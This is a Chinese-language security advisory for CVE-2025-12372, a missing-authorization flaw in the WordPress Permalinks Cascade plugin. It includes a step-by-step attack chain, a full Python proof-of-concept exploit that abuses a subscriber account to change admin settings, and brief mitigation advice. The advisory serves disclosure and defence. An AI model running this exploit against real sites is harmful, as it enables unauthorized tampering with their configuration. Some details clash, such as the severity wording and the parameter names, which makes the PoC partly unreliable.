CVE-2025-12372 WordPress Permalinks Cascade插件未授权访问漏洞

漏洞信息

漏洞编号

CVE-2025-12372

漏洞类型

未授权访问/权限控制缺失

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress Permalinks Cascade插件

漏洞概述

CVE-2025-12372是WordPress Permalinks Cascade插件中的一个严重安全漏洞。该漏洞属于"缺少授权验证"（Missing Authorization）类型，存在于插件的handleTPCAdminAjaxRequest函数中。漏洞影响范围覆盖该插件2.2及以下所有版本。由于插件在处理管理端AJAX请求时未能正确验证用户权限，认证攻击者（拥有subscriber级别权限及更高权限的用户）可以在未经授权的情况下执行管理操作，包括启用或禁用自动ping功能、修改页面排除设置等。此漏洞的CVSS评分为4.3（中等严重程度），攻击向量为网络形式，认证要求低，无需用户交互。虽然该漏洞对机密性和可用性影响较低，但可能对网站整体配置和SEO功能造成影响。漏洞由Wordfence安全团队于2025年发现并报告，建议受影响的WordPress网站管理员立即采取修复措施。

技术细节

Permalinks Cascade插件的漏洞根源在于admin/admin-controller.class.php文件中的handleTPCAdminAjaxRequest函数缺少适当的权限检查。该函数负责处理前端AJAX请求，但未调用current_user_can()或类似权限验证函数来确认请求者是否具有管理员权限。在WordPress中，subscriber是最基础的用户角色，通常仅能阅读内容而不具备管理功能。然而，由于插件开发者错误地假设AJAX请求只能来自管理员页面，导致任何认证用户（包括subscriber）都可以通过向wp-admin/admin-ajax.php端点发送请求来触发该函数。攻击者可以构造特定的AJAX请求，设置action参数为handleTPCAdminAjaxRequest，并传递相应的操作参数（如enable_autoping、exclude_pages等），从而修改WordPress的永久链接设置和ping功能。漏洞利用不需要任何特殊的工具或技术，普通的HTTP请求工具即可完成攻击。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者首先识别目标网站使用的WordPress版本，并检查是否安装了Permalinks Cascade插件。可以通过检查/wp-content/plugins/the-permalinks-cascade/目录或查看页面源代码中的插件特征来确认。

STEP 2

步骤2: 获取低权限账户

攻击者需要拥有一个有效的WordPress账户，权限级别为subscriber或更高。可以通过默认注册功能、用户枚举或已泄露的凭证获取。攻击者也可以注册一个新账户。

STEP 3

步骤3: 构造恶意请求

攻击者构造一个AJAX请求发送到/wp-admin/admin-ajax.php端点，设置action参数为'handleTPCAdminAjaxRequest'，并添加要执行的管理操作参数，如autoping_status或excluded_pages等。

STEP 4

步骤4: 发送攻击载荷

使用有效的认证会话发送构造好的AJAX请求。由于插件未验证权限，请求将被服务器接受并执行，修改WordPress的ping设置或页面排除规则。

STEP 5

步骤5: 验证攻击结果

攻击者可以通过检查网站设置或发送后续请求来验证操作是否成功执行。成功的攻击会导致网站的SEO相关设置被未经授权地修改。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12372 PoC - Permalinks Cascade Plugin Unauthorized Access
# Target: WordPress site with Permalinks Cascade plugin <= 2.2

def exploit_unauthorized_access(target_url, username, password, action='disable_autoping'):
    """
    Exploit missing authorization in handleTPCAdminAjaxRequest function
    
    Args:
        target_url: Base URL of WordPress site
        username: Valid subscriber-level username
        password: Password for the user
        action: Admin action to perform (disable_autoping, enable_autoping, etc.)
    """
    
    # Setup session
    session = requests.Session()
    
    # Login as subscriber
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1'
    }
    
    print(f"[*] Logging in as subscriber: {username}")
    response = session.post(login_url, data=login_data, allow_redirects=True)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed!")
        return False
    
    print("[+] Login successful!")
    
    # Prepare AJAX request to exploit the vulnerability
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    
    # Different actions that can be performed unauthorized
    actions = {
        'disable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '0'},
        'enable_autoping': {'tpc_action': 'toggle_autoping', 'autoping_status': '1'},
        'modify_exclusions': {'tpc_action': 'update_exclusions', 'excluded_pages': '1,2,3'}
    }
    
    if action not in actions:
        print(f"[-] Unknown action: {action}")
        return False
    
    # Construct exploit payload
    exploit_data = {
        'action': 'handleTPCAdminAjaxRequest',
        **actions[action]
    }
    
    print(f"[*] Sending exploit request: {action}")
    response = session.post(ajax_url, data=exploit_data)
    
    if response.status_code == 200:
        print(f"[+] Exploit sent successfully!")
        print(f"[*] Response: {response.text[:200]}")
        return True
    else:
        print(f"[-] Exploit failed with status: {response.status_code}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password> [action]")
        print(f"Actions: disable_autoping, enable_autoping, modify_exclusions")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    act = sys.argv[4] if len(sys.argv) > 4 else 'disable_autoping'
    
    exploit_unauthorized_access(target, user, pwd, act)

影响范围

Permalinks Cascade插件 <= 2.2

防御指南

临时缓解措施

如果无法立即升级插件，可以通过以下方式临时缓解：在wp-config.php中添加代码限制非管理员用户对相关AJAX端点的访问；或者暂时禁用Permalinks Cascade插件，待官方发布修复版本后再重新启用；同时检查网站日志确认是否存在未授权的配置修改尝试。